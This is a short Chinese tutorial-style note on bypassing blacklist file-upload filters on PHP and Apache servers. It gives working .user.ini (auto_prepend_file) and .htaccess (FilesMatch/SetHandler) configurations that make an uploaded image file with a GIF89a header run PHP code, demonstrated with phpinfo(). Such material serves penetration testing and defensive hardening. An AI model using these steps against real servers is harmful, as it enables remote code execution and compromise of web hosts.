黑名单文件上传绕过
我在西北,一山又一山。与你相隔,一关又一关。
漏洞概述:
- .htaccess用于Apache
- .user.ini用于php
漏洞复现:
-
.user.ini
原理:
.user.ini将所有php文件自动包含任意木马文件执行。
使用条件:
只要以cgi/FastCGI/fpm模式运行的php,并且上传目录下要有正常可执行的php文件,都可以成功包含上传1.user.ini
auto_prepend_file=1.jpg
然后上传1.jpg
GIF89a
<?php
phpinfo();
?>
访问正常php文件,即可成功包含
- .htaccess
前提apache,需要开启
Options FollowSymLinks
AllowOverride All
LoadModule rewrite_module modules/mod_rewrite.so
然后上传1.htaccess
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
访问1.jpg即可执行php
**余生很长,请多指教。**